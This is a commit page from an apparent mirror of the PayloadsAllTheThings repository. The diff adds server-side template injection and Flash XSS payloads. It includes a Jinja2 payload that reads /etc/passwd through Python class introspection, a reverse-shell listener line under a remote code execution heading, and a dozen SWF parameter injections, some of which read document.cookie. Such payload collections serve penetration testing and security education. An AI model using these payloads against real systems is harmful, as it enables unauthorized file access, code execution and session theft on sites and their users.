ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-21 14:16:07 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

SSTI + XSS Flash

Browse Source
This commit is contained in:
Swissky 2017-07-16 16:30:08 +02:00
parent 77e2fc8226
commit 064467ecfc
3 changed files with 21 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
Template injections/JHADDIX_SSI_Injection.txt → Server Side Template injections/JHADDIX_SSI_Injection.txt
View File

9
Template injections/README.md → Server Side Template injections/README.md
View File

@ -6,6 +6,11 @@ Template injection allows an attacker to include template code into an existant
[Official website](http://jinja.pocoo.org/) [Official website](http://jinja.pocoo.org/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
Basic injection
```
{{4*4}}[[5*5]]
```
Jinja2 is used by Python Web Frameworks such as Django or Flask. Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on Flask application. The above injections have been tested on Flask application.
#### Template format #### Template format
@ -37,7 +42,7 @@ The above injections have been tested on Flask application.
#### Read remote file #### Read remote file
``` ```
# ''.__class__.__mro__[2].__subclasses__()[40] = File class # ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
``` ```
#### Write into remote file #### Write into remote file
@ -46,7 +51,7 @@ The above injections have been tested on Flask application.
``` ```
#### Remote Code Execution via reverse shell #### Remote Code Execution via reverse shell
Listen for connexion Listen for connexion
``` ```
nv -lnvp 8000 nv -lnvp 8000
``` ```

19
XSS injection/README.md
View File

@ -73,11 +73,20 @@ With an additional URL
XSS in flash application XSS in flash application
``` ```
\%22})))}catch(e){alert(document.domain);}// flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);// ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
"a")(({type:"ready"}));}catch(e){alert(1)}// swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
``` ```
XSS in Hidden input XSS in Hidden input